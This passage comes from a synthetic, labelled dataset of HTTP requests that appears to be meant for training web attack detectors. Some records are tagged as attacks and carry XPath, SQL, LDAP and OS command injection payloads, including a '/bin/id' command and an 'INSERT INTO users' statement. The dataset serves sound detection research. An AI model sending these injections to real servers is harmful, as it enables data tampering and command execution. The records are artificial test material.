cpxoO7Tdmo@B=tlm&tmpwlsX7WKX3=ozsr374esrxmwhere&&3vunionlOYKyZwj=where= bn&ACdYTEzAC=i7L(aawheret8cerinibhdsa&PlWincludefKq=tB5MaAKp&Wdnee=reio&6Esloiiahrr=923&e7dyeaI=928&deyredeRs3nat=@&bte=schoN&goa=739&nare=757

End - Id: 6531
Start - Id: 22316
class: Valid
GET /gaDPO/neai.cfm? HTTP/1.0
Host: 209.72.100.176
Connection: dcx5ea
Accept: */*
Accept-Charset: x-mac-korean
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 77.119.118.42
Cookie: QzreYhsaZ=100388;ee9Tpme6Ee1s=0&S;iCaiwHttl=l@Btmv4jN6;Et10Aaoels=10WlxyOD1d;npenAetlnonnHan=cMLXIhlaYw
Cookie2: $Version="57"
Date: Tue, 17 Jul 07 23:32:32 CET
ETag: "7vxJSGxgT0krKIHAEhf"
Expect: 100-continue
From: auRypu@Ia7irt.fr
If-Modified-Since: Tue, 04 Oct 05 19:41:54 GMT
If-Unmodified-Since: Wed, 15 Nov 06 21:19:25 UTC
If-Match: "MVKY82bPc0IC21YG"
If-None-Match: *
If-Range: Sun, 16 Aug 09 05:56:07 GMT
Max-Forwards: 7
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM c2lkNE5kdGV3dFVUOGEzeTZybG9iZ2FuMm5seG9VaEhObWZocHIzT2lkMWFlYQ==
Authorization: Basic MDFocXI6ZU90eWV1ZQ==
Range: -644,-6,-3532
Referer: /esa1hr/hPemw/untmu/m29tHtC.mp3
TE: deflate
Trailer: Trailer
User-Agent: Mozilla/3.6 (compatible; Konqueror/7.0; Unix; 6oYtdLde; kyysTS; snngteiid)
UA-CPU: 68000
UA-Disp: 6322,2576,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0738x9218
Via: 0.6 2.45.18.151, 6siiha/7.1 www.tedodt.jpg
Transfer-Encoding: compress
Upgrade: eOhtM/9.6, icm/5.3, zas/4.8
Warning: 813 120.61.228.249 "ekzhteuLsc" 
X-Forwarded-For: 4.252.134.91
X-Serial-Number: 8809830
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22316
Start - Id: 16719
class: Valid
GET /yuxIAnNfiyq7vvmEYhO/wKFSha-bdH2EB/uEetyr/HU/nOzQUSVU1fa60Nv/0a4Kcat/6WPboot.ini4/opsinstAeneaemq0/sIxEprSxnsy/gl/i4cehkAsod/f_UavLN6.bin?eydM2satxuooobg=2814527&tcsaznoEgfDaets=5528161&fzt72nvshft=putmp4w%3Eaui&ashNpfse9h=rt&thsr=hSHsE8ZdGxD&AcNm2SnahAoa6=tegPIDMzY&aleev=r-1GFGq1E.&ueonhez=tgnSemrsnkdtnmaWr HTTP/1.0
Host: 44.72.53.93
Connection: rqcgtarn
Accept: audio/*;q=0.2, video/mpeg
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: tsa18pc-h38;q=0.6, OH-t, A-8msnefE
Cache-Control: max-age=07520
Client-ip: 25.236.249.109
Cookie: goxYSt4=h;aen8nkM=UiOi;cdasrudejrocrCm=27855;to=s;QoptXT=gkUUm8;abrge=73909
Cookie2: $Version="880"
Date: Mon, 27 Oct 08 17:40:12 CET
ETag: "cmZAk1UstqOVNUvSS-AP"
Expect: 7tcslhbw=wuirr;dhkawis=ocacpi
From: o6botttt@Meerth.org
If-Modified-Since: Sat, 22 Apr 06 03:31:54 UTC
If-Unmodified-Since: Sun, 05 Apr 09 05:51:40 UTC
If-Match: *
If-None-Match: "NuM34DwrGkPL353JV"
If-Range: "Spn0SnVTZnxxdfVMG"
Max-Forwards: 77
MIME-Version: 4.6
Pragma: a=dsrmgw
Proxy-Authorization: NTLM Y29kbXc0dXlob3VlZmVzcmQwZWFzdWhsaFJubm5oM2I1VGU=
Authorization: Digest nc=82E0feed
Range: 735-128151,-280736
Referer: /t6snvee/1sheaedl/phhto/t8ooT/td6d.pdf
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.7 (Machintosh; U; Mac OS X 5.5; ot-5i; rv:0.7.2) Gecko/36655050
UA-CPU: x86
UA-Disp: 3273,598,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2648x5027
Via: 1.7 33.167.176.136
Transfer-Encoding: deflate
Upgrade: wsgnwl/0.0, 7nltw/5.0, 7ai/7.4, rhRh/3.3, eMvtpm/2.1
Warning: 635 111.175.4.37 "odotyu1nei7D" 
X-Forwarded-For: 36.167.185.207
X-Serial-Number: 6672124414
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16719
Start - Id: 49098
class: XPathInjection
GET /Ufh/dKYfP5TZDBv9oKv/weTe/bngatndt9soVe4afg/e07p/MBB6Gsbgsound3Lr/rers0te/eXkrAZLRId.png?4aeoNtjrhosix=shxAhh%2F3%2Fa5t%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D324%5D+++++%7C+++ezn%2Fais%2Fa%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D413%5D+or+++++%27o2h%27++++%3D%27&m94oRoc=+&rcszEvfE7l=MlhnE3ashEenjrah0&ahdhohneookde=79047 HTTP/1.0
Host: www.uiita.net
Connection: nd47xbfE
Accept: image/*;q=0.4, video/mpeg, image/jpeg
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 215.194.111.216
Cookie: 7cAcai4otqttnp9=3;l9edatAet=T(csn1l7;p7DX1UzQj_td=koaeabi3unauuimn
Cookie2: $Version="212"
Date: Wed, 25 Jun 08 11:54:56 GMT
ETag: W/"8TzYy1Hxv1jlxWF"
Expect: aZnyhTei
From: oayjh@w9ulna6.biz
If-Modified-Since: Thu, 03 Jul 08 07:47:27 GMT
If-Unmodified-Since: Sat, 06 Nov 04 23:42:54 GMT
If-Match: "xOdDzZBstjtmPsNj"
If-None-Match: "YVW6aYEA78kymeS"
If-Range: Sun, 31 Oct 04 03:34:56 GMT
Max-Forwards: 801
MIME-Version: 4.7
Pragma: clui2pz=7Ew
Proxy-Authorization: Basic ZmhkZTp0dWV1dA==
Authorization: gijla d8wEsd=t1Rj
Range: -21
Referer: /Ngpte/h3t8dae/lnaeuj4g/tF6e/tsnahb.tar.gz
TE: trailers,chunked;q=0.2,trailers
Trailer: Referer
User-Agent: Mozilla/0.2 (Machintosh; U; PPC Mac OS X 6.6; o3-Sc; rv:3.2.0) Gecko/62843974
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7313x7197
Via: ekfeO/3.1 www.nfi2.shtml
Transfer-Encoding: gzip
Upgrade: aau/4.8
Warning: 839 245.108.185.165 "nonbs" 
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49098
Start - Id: 48508
class: XPathInjection
POST /ZKjHFLP/trltoRneeeecA590.jpeg? HTTP/1.1
Content-Length: 324
Content-Language: r3crqebj
Content-Encoding: gzip
Content-Location: http://www.Hrttee.fr/iitp/Rr4rn0rr/hniepmxn.php
Content-MD5: c25vb2ZvZW5wc2hpOHRpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Nov 09 03:20:28 CET
Last-Modified: Sun, 24 Apr 05 15:58:18 UTC
Host: www.Cgx9rev.fr
Connection: ciu6eS
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: fsh-o, iwF-L2hem;q=0.9
Cache-Control: max-stale=29
Client-ip: 117.212.24.161
Cookie: eranartRosh59sp=ypeS;mlmsii1sotet=eGX1bsn;oieexusohs=919;HHRjk79ekAxQ=5eR;2trTrit;pdTtp=inhaetp<cxD
Cookie2: $Version="2"
Date: Fri, 26 May 06 10:03:57 UTC
ETag: W/"Z8k6MID8rdOhM91kgfF"
Expect: medziZgs=din4
From: 3eaqc@eaed.ch
If-Modified-Since: Tue, 21 Oct 08 18:57:20 CET
If-Unmodified-Since: Fri, 23 Sep 05 20:28:04 UTC
If-Match: *
If-None-Match: "iULHKT54WCFCYV8FLL"
If-Range: Mon, 12 Jul 04 10:54:36 CET
Max-Forwards: 65
MIME-Version: 4.9
Pragma: no-cache
Authorization: Basic cml0aGU6c2tvcnl4b3I=
Range: 50804-188288,858386-
Referer: http://n4rmoau.com/bae6da/Izfet.swf
TE: trailers
Trailer: Cache-Control
User-Agent: 9ptmn9e (aEgmhwDJ)
UA-CPU: 68000
Via: FTP/5.9 2.174.8.152, 3eaoo/2.4 23.210.233.175
Transfer-Encoding: compress
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 01871
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

Qr=cetemnU&irqiLz7a== 0esee5eedCn&eliie=ilw'     or    (i    <  count(2oertg/child::text())     and  j     <    count(qrgsgi/child::comment()) and k  <     count(h0de/child::*)     )     or     'yd7E'    =  ' sl'     or&LeoaoQos=ehs&TDlisaararsi=ndtEeor?tntizo

End - Id: 48508
Start - Id: 43371
class: OsCommanding
GET /tdmae.gif?sHeetexaaolrt=%5C%3B++++%5C%2Fbin%5C%2Fid++++%3B HTTP/1.0
Host: www.qsdonti.de:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 255.185.181.53
Cookie: amon7eFsvuuC=88;boErsvned=sew4ohnasa;oEcpfiosy=5;eEecbHo=aHig9rhnxe
Cookie2: $Version="002"
Date: Tue, 28 Mar 06 01:39:56 GMT
ETag: "t_0bP8amfnwUL9KrdCI"
Expect: aoukreuC
From: orlrdan@v6sk.it
If-Modified-Since: Thu, 29 Apr 04 21:49:04 UTC
If-Unmodified-Since: Wed, 07 Feb 07 11:22:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 90
MIME-Version: 2.7
Pragma: eecnay=useeirai
Proxy-Authorization: Basic c3RvbzpFcHRvbG0=
Authorization: stt7m heees=nnhm3bi
Range: 025-,561060-
Referer: http://www.Qstt6o.fr/tasm/bwoue/2radcl/ho99al/eFdab.tiff
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/6.8 (Machintosh; U; PPC 4.4; Xh-qH; rv:1.0.6) Gecko/12905692
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 552x8251
Via: 1.3 98.195.180.140, 8.5 www.asnnt.htm
Transfer-Encoding: identity
Upgrade: HaT6gy/0.1
Warning: 782 www.e5rte.tiff:876 "07ituthT2yrwlHit1ah" "Sat, 29 Jul 06 07:27:58 CET"
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 68319129
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43371
Start - Id: 5591
class: Valid
PUT /n1uIX./iAeuinrsss6eke/sYLsreplace5n_funionoxxQ/wfb/aY/ehodo7yztnottyEasoio/gA6QpXv@2S/qH0vb5l5H.msf? HTTP/1.1
Content-Length: 48
Content-Language: l2us7ahr
Content-Encoding: identity
Content-Location: /qcic4/Afee/eoee5/roqi.php4
Content-MD5: ZXRwZGFvdHRzbGVmaWUzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Oct 07 16:35:36 GMT
Last-Modified: Wed, 10 Jan 07 07:18:38 UTC
Host: 50.206.6.244
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, identity, compress, deflate;q=0.4
Accept-Language: 9Ieo-9t, r-r5gtgdzm;q=0.7
Cache-Control: no-transform
Client-ip: 120.107.44.213
Cookie: aytont4uyruaep=Msqvotpet9
Cookie2: $Version="761"
Date: Tue, 26 Dec 06 18:35:18 GMT
ETag: W/"yf8v3S-hPt7MNYXsQGs2"
Expect: 100-continue
From: lsbetkih@rdl7oi5.fr
If-Modified-Since: Fri, 16 Mar 07 12:44:47 GMT
If-Unmodified-Since: Tue, 06 Mar 07 10:32:50 CET
If-Match: *
If-None-Match: *
If-Range: "0djZlhP1RAs0H0d"
Max-Forwards: 2340
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="retgil"
Authorization: NTLM dXJldW9qb0FlcW11czJzMGQ2bm92YWxvdEdvYURhTFRvaGFobWU0cw==
Range: 673-
Referer: /teao0niw.shtml
TE: deflate,trailers,trailers
Trailer: If-Modified-Since
User-Agent: TOla4e2ehreodtAc3
UA-CPU: x86
UA-Disp: 6817,0716,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0202x3743
Via: met9is/6.4 www.9SceOik.png, 7.3 128.84.240.7:1, 9.1 www.ru9od.tiff
Transfer-Encoding: deflate
Upgrade: 0gdai/9.0, eup9/9.9, osahep/0.7, ihgie/4.7
Warning: 629 www.fs0i.shtml "erdO60eMst" 
X-Forwarded-For: 180.152.86.133
X-Serial-Number: 07654558799930280172
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

updateeXEu1=95&ef7oHvddrtic=5&eM_c-uIeH_=n=nDj

End - Id: 5591
Start - Id: 41332
class: SqlInjection
GET /Dti/-l@55KQ3nrboot.iniV/sgJcCpwMP8L02e8.htm?Dovafag2hsI=Ac4uouasinrkornUo&thqrFtbzn3=ssee+fbiframee&ereznenfiEy=scriptfromzEb&nwugmty=5756437&slensKEOL7hwg=353&rocchotneail=eait5pirana&eci25eyzneunne=lTtp6_dL0&aoobs=likeeexecev%3Etr&itsoe=7aqt&ndn=416&99l=92r&iu01tmc=192 HTTP/1.0
Host: www.isdib.org:61
Connection: pailrxp
Accept: audio/basic;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.5
Accept-Language: lwfohCtA-i, aoa-tiEp1;q=0.0
Cache-Control: no-cache
Client-ip: 76.150.212.124
Cookie: xaccess_logDcDaccess_log@Y='    + (    SELECT    TOP 1   nA  FROM   otrt) +    '
Cookie2: $Version="061"
Date: Sat, 28 Mar 09 23:21:09 CET
ETag: "-Q8Z-Yjn0LYulqeZ4-GT"
Expect: 100-continue
From: r1ttlt@ncfaceqdro.ch
If-Modified-Since: Mon, 26 Apr 04 16:38:15 UTC
If-Unmodified-Since: Wed, 30 Aug 06 03:32:35 CET
If-Match: *
If-None-Match: "DdwYvFPqO-HvH9hIIa"
If-Range: Thu, 07 Jan 10 23:40:37 UTC
Max-Forwards: 571
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: NTLM YWVhZU82MWFjdGVhc2NlaHRiZGVjZWd6bHNhdGk3ZWVpb3RlaWFy
Authorization: ngset ss9u=43ea
Range: 01-464,32429-6
Referer: /Hdiht/at8esr/erM0ods.php
TE: trailers
Trailer: From
User-Agent: 9sEe2lOdoeetltxehty
UA-CPU: Sparc
UA-Disp: 4567,8228,16
Via: 5.2 154.161.39.165, HTTP/8.5 www.srkrcsso.htm
Transfer-Encoding: identity
Warning: 947 187.108.219.250 "uuSvemuiaeaaecaeEb" 
X-Forwarded-For: 187.101.236.216
X-Serial-Number: 20189162980688287455
----: ----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 41332
Start - Id: 23971
class: Valid
GET /npd2LmD@f9553FJ/rnky8wY7U/38/F8S/Lflsotoasz/ii7E5mlauaifttem9t.cfm? HTTP/1.1
Host: 16.120.222.40:80
Connection: keep-alive
Accept: image/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: xsers-cte
Cache-Control: only-if-cached
Client-ip: 75.189.212.193
Cookie: amzsTy2seleioC=v2y;fple7uh=rC7e;zo=etaf;qnmRtmD29t=pSdothoNqah
Cookie2: $Version="33"
Date: Sun, 15 Mar 09 10:51:00 UTC
ETag: W/"biRChpvqa9ykj6Mj-e"
Expect: 100-continue
From: htqn@tqeodss7o.fr
If-Modified-Since: Fri, 06 Oct 06 02:30:26 CET
If-Unmodified-Since: Sun, 27 Apr 08 03:33:44 UTC
If-Match: *
If-None-Match: "kigHLxaFNVZg4M8dEs"
If-Range: *
Max-Forwards: 0135
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: inaoa alei=oniea9pA
Authorization: Basic dHNlNGVwZGg6QnAwcXM=
Range: 1318-,5425-185
Referer: http://nyulE2.com/toaaThu2/yhwd0P5/eittd/tPihh5/In6i9ri.ace
TE: chunked;q=0.5,gzip,chunked
Trailer: Accept-Charset
User-Agent: eUQVT@1 http://www.cnvreA.fr
UA-CPU: StrongARM
UA-Disp: 862,451,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 424x2298
Via: 7.2 42.38.169.145
Transfer-Encoding: identity
Upgrade: enhoj/4.8, Bdg/4.7
Warning: 887 www.oialrTl.png:6 "2bmahswyehtth" 
X-Forwarded-For: 53.58.146.5
X-Serial-Number: 149109156633944
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 23971
Start - Id: 24381
class: Valid
GET /I9tFk8EY@9z8T/dCZHLl/7jsOAdBSBjOX/AJn.pl?amrreoe8nehhcls=5WcjeqD&TG6script-q0UGS=Tpto&bemetmejMsshre0=e&dsexuhh4ssw=754&n2gls-J.g4IWW=11&taEgSo0m=++tc9ta+t%5Bhtw3ssE%29&wISoQ_6=Egr&r7i6leEeeo=taroEtedwn-n&t2oncivseszpaia=+x%28ismruu%25r%7Etotspts&bsoj3ErtZoayn=1370 HTTP/1.1
Host: www.syjuomf2o.net:80
Connection: close
Accept: audio/*;q=0.9
Accept-Charset: x-mac-chinesesimp, x-mac-cyrillic, windows-1254
Accept-Encoding: deflate;q=0.3, gzip
Accept-Language: *
Cache-Control: max-stale=40
Client-ip: 254.183.211.205
Cookie: mwnnl7tAaee6a=~ci8s\oteawer;tntox5i=l0telnet67;vttpLsrLx=aG_quwO
Cookie2: $Version="518"
Date: Fri, 02 Feb 07 02:00:07 GMT
ETag: "2Wf1wyJ8Y4mt38WOd"
Expect: 100-continue
From: Tieh@ettdu.fr
If-Modified-Since: Sun, 16 Apr 06 01:43:56 CET
If-Unmodified-Since: Tue, 25 Jan 05 20:39:44 UTC
If-Match: ".OJXi-Y-2J5wX5qE96a3"
If-None-Match: *
If-Range: Tue, 29 Apr 08 14:55:50 UTC
Max-Forwards: 0
MIME-Version: 3.6
Pragma: hun=St0ipnes
Proxy-Authorization: NTLM ZGE5ZWVjbGVjaW1vb2VuYnRoaWV0c3J1YWgxb2h0MWxkc2hpMG9nbHN0cA==
Authorization: i7sa Sinn=trCo
Range: 18-
Referer: /wmepu/eefhos/lhiht2Hn.jsp
TE: gzip
Trailer: Accept-Charset
User-Agent: Mozilla/2.3 (Windows; U; Win 9x 5.2; cl-io; rv:3.7.7) Gecko/22240675
UA-CPU: 68000
UA-Disp: 801,8735,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 1274x3966
Via: u8h/5.8 221.240.34.116, FTP/2.4 187.179.21.91:825
Transfer-Encoding: identity
Upgrade: ya9/0.7
Warning: 583 www.digi.js "ep3nn0retlwyt" "Wed, 24 Dec 08 19:28:30 CET"
X-Forwarded-For: 231.128.57.40
X-Serial-Number: 2633787147170718759
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24381
Start - Id: 48945
class: XPathInjection
GET /0Hxrre/ohtpoyrsej9RbNeayani/aoeno8ct6o/dhKder7Atdt9tiaa5dtl/anndqag/mmrA/Sqha3di38almtap/hyzH-4@NLFNV9/3Jf08VA50sgJ2Y/idutf/atso7yparhe/wlspOhte.cgi?body4s8F6=29&evr5hosi=295&638aker=%5C-&hKu0ltTl=rt%28meodrUrN+hdt&8ahdhtl4runeuha=54009&3s9replaceincludeG9=nonm1Eeo%27++++or+++++6++%3C+++++count%28path%2Fchild%3A%3A*%29++or++%27e1ca%27+++%3D+%27 HTTP/1.0
Host: www.gnret.com:80
Connection: titf
Accept: */*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 208.68.234.50
Cookie: tdOa8iajweD8h=yIUZq;aeei9u8ltr=dsataktp6m;oftq6Rtwdee=73
Cookie2: $Version="818"
Date: Tue, 16 Nov 04 23:00:23 GMT
ETag: "i8pw8MiXbYxDFs-"
Expect: 100-continue
From: 11ria@soa2e.be
If-Modified-Since: Tue, 26 Feb 08 09:08:50 CET
If-Unmodified-Since: Sat, 28 May 05 08:29:09 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 14 Aug 06 17:40:55 UTC
Max-Forwards: 362
MIME-Version: 8.7
Pragma: rr='egansd'
Proxy-Authorization: Digest response="bDD9738c8b7dB2ba67BAcc1DF2f5adcE"
Authorization: NTLM OWFoNm51aXR0c3Q5Y25yOWlhdHJzbWlzZWhhc2VOaTBlcw==
Range: 326-470558,-0121
Referer: /4ngddia/letl/tloUn.sh
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/1.8 (compatible; Konqueror/7.8; Windows NT; eogxne; fmsr5; tsenri)
UA-CPU: 68000
UA-Disp: 3657,5420,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 508x349
Via: 6.0 www.tOHslei.gif
Transfer-Encoding: identity
Upgrade: neho/9.5, zih7sw/6.0, yitr/8.3, e0e6er/6.0
Warning: 874 173.192.166.189 "RHrt5n" "Sun, 30 Mar 08 15:54:31 UTC"
X-Forwarded-For: 9.137.128.106
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48945
Start - Id: 786
class: Valid
GET /ePEFA5N.aq/ZacceptlfOkscripthtpass-Hsn.shtml?SXy.p=39743&s5r=67965579&thrtar=%2B0%5B7rue&hieEwWobex7eo=dlvbscriptslbsItnsbbb&Iaeeii3apiti2=ulYlMp&zm17utoncB9=6928&cchlo=0rhcnthgrsn&tasiDnnthollt=4&SFiK=tOkuaMn&KbgJqQk=low8Oz&epsnVltetwtbn=10815 HTTP/1.1
Host: www.rIsiYi.net
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: rslx-os, tei-u;q=0.1, aeeeil-a
Cache-Control: min-fresh=9
Client-ip: 255.154.164.96
Cookie: madartcdrCRc=dP@.7nQUg@Rf;I32xrmfC=2454;eiaC=45041470;r9oz=euuhbankrsighPiil;teydW=orEQso0reT
Cookie2: $Version="824"
Date: Thu, 05 Jul 07 09:33:42 CET
ETag: W/"vmSA-6D5iyFnqPDf"
Expect: 100-continue
From: oxndn@a7opriy.uk
If-Modified-Since: Mon, 21 Jun 04 02:17:16 UTC
If-Unmodified-Since: Fri, 10 Mar 06 15:29:11 CET
If-Match: *
If-None-Match: "xOFpvoRc.Gcje7Pt"
If-Range: Wed, 03 Jun 09 22:29:52 CET
Max-Forwards: 6
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM dHRtN29tZWlhZW5xdG90UmlldG44U2FyZWVyYzdueHRhNmFmZHNobEVybG4=
Authorization: Digest cnonce="ii2a"
Range: 397-33460,-9077,044523-
Referer: http://mfuh9.de/steinGnr/maeiby/0eosNe3.png
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: aJqFpY http://www.IGsnw.uk
UA-CPU: PowerPC
UA-Disp: 2800,8749,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 305x8403
Via: HTTP/6.8 www.kuis.htm
Transfer-Encoding: identity
Upgrade: zufZE2/7.5, owei/6.5, slroee/5.9
Warning: 303 www.herida.css "typL" "Tue, 07 Mar 06 04:42:54 GMT"
X-Forwarded-For: 69.243.92.99
X-Serial-Number: 40823
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 786
Start - Id: 17743
class: Valid
GET /evjqi1kfx19GF5N9H/pdOZ7xq/hfzLSTTi-8UnE7WQd/zaZkhR@tWZaSwFHZj/Cizzr4r4th/dahwt03Aeal/5oFjnchtqd/h_jy5tMT-/yDMgcY5j4D4.mdb?eiAnicqdoirt=Iallwi%5C+&6uget=z3O5uX&TTj@L6_.B1=moLtel2ur&yxe=1&uhL-HanR_=-m%5Dr+ HTTP/1.0
Host: 156.78.178.34
Connection: keep-alive
Accept: audio/basic, application/rtf;q=0.7
Accept-Charset: utf-8, windows-1258, iso-8859-5;q=0.9, x-mac-arabic
Accept-Encoding: identity;q=0.9, identity, deflate, deflate
Accept-Language: *
Cache-Control: omhairs='jekknEse'
Client-ip: 66.109.210.39
Cookie: tth5es=nh;baep=tCS
Cookie2: $Version="262"
Date: Thu, 29 Oct 09 15:44:05 CET
ETag: W/"3@4RD6q0Fxy7Dxh0iz@_"
Expect: epomr=Yh7oirN
From: ptjes@1agseqle.uk
If-Modified-Since: Tue, 18 Apr 06 18:27:09 UTC
If-Unmodified-Since: Thu, 05 May 05 07:06:02 UTC
If-Match: "CbM6ESaF@w3MZ_lEbxY"
If-None-Match: "Mw6SJIQj_b4h@WlR0z"
If-Range: "xr8vporsRrfTm3U6WVpG"
Max-Forwards: 649
MIME-Version: 4.2
Pragma: dnet='rdhi7goc'
Proxy-Authorization: Digest realm
Authorization: frorea epfrth=esLwmh
Range: 012393-4,26670-6749
Referer: http://h0aeanp0.de/sfehdi/hln3at/Tnnrsut/l8atesai/UEatuHe.cfm
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: kvhsq4V http://www.pehe5oNi.it
UA-CPU: x86
UA-Disp: 8841,8953,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 582x198
Via: HTTP/6.1 69.182.251.60
Transfer-Encoding: deflate
Upgrade: ZHn/3.1
Warning: 725 124.182.181.17 "nnnetcsfa" 
X-Forwarded-For: 102.74.69.231
X-Serial-Number: 197606037
----: ----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 17743
Start - Id: 42486
class: SqlInjection
GET /6bkphHJH/HM/miiOHacscabrd/hN3KhF2sn_91DESBxo-8/snNYGE6-GxhU19S-c99M/roUG/croG9KW/m1I@NFiONxxM/dgi/ZSJjML/hruusm4Odjeslwd6su.msf?dllnhtioy=dstu&L9QmT0Eain93Q=%3B+++EXEC%28+++%27INS%27%2B%27ERT++INTO+users+++values%285640%2C%27eSadocts%27%2C%27mdUkte0%27+%29%29&9hlaiyo7dwn4rTh=ucBYvfs-hHu&mirhN=03743074&ftpKCH5jy=rcp&cdaimntm=+oka&tmeshPhatnerc=eLbhhe+onso&sci8bordr=72586902&vtpwmttsUer=8&6SiihhnmARefs=79671&9eo6EfwEt=sepassthruSc58w%40eeL&a2ddpns49ac8t3n=cd3Foo5keVa%3BS%24n&uApninbonfew=gh&eGyiOoAg=%3A%7CRa HTTP/1.1
Host: 112.192.210.190
Connection: close
Accept: text/*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: gzip;q=0.5
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 89.45.12.136
Cookie: mtermtcairtfyHp=egKoae]y;tenEtapu=ah;nf5lhy=6015892;ygaYedafrnoetc=r8MuKzqIe9;RcY3KO=h
Cookie2: $Version="2"
Date: Wed, 31 Oct 07 08:01:00 GMT
ETag: W/"yIy09km3OC5eA@3"
Expect: 100-continue
From: sheo@RafNi.uk
If-Modified-Since: Sun, 17 May 09 12:48:11 CET
If-Unmodified-Since: Tue, 06 Sep 05 14:11:54 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 146
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: tnrr qtclsQSi=e3eg
Authorization: emmed 32haU8=slot
Range: 7-59040
Referer: /rildeh/dto5.gif
TE: trailers,chunked;q=0.2
Trailer: Transfer-Encoding
User-Agent: ndln (tAk4x2BC; e3iQwMj6; avOmh4e)
UA-CPU: x86
UA-Disp: 6364,160,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 733x829
Via: hues/8.8 107.178.28.50, FTP/5.4 www.ntEr3r.css, FTP/2.3 142.32.158.214
Transfer-Encoding: identity
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 070 www.uytrfen.shtml "0il5iniate" 
X-Forwarded-For: 25.37.30.27
X-Serial-Number: 029543372781579317
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42486
Start - Id: 38697
class: LdapInjection
GET /galzfsds/eus4ee/rerzDedbexwshtd.htm?boilrsbo1=sybae2hd0nI&styn=ouYho&ts6noarhFe=deCVM&iey6ntn=rncaneltShoEe3wO&cnshnhh=623&toY6dnnu0en=0ah&_UJ5RP1oazI=41%29%28%26%28objectClass%3DiLre%29%28%7C%28sn++%3D+++saqn%29%28cn%3Dd3H++J*%29%29&nei=ih7uXk4&@lLgJ=5420620619 HTTP/1.0
Host: www.omGefsee.com
Connection: Dnkzritb
Accept: */*;q=0.4
Accept-Charset: windows-1250, iso-8859-5, iso-8859-3
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=6564
Client-ip: 218.181.248.159
Cookie: XloghrmIj43processing-instructions_=eU@JpTq29w;U4ituh=0;AoeeSxoki=5;6et=seg6at1Rte2eo
Cookie2: $Version="63"
Date: Wed, 19 Mar 08 21:44:43 UTC
ETag: "fO3hMoGbmyhoF4WVadN_"
Expect: ribEgiA=itelO;odita
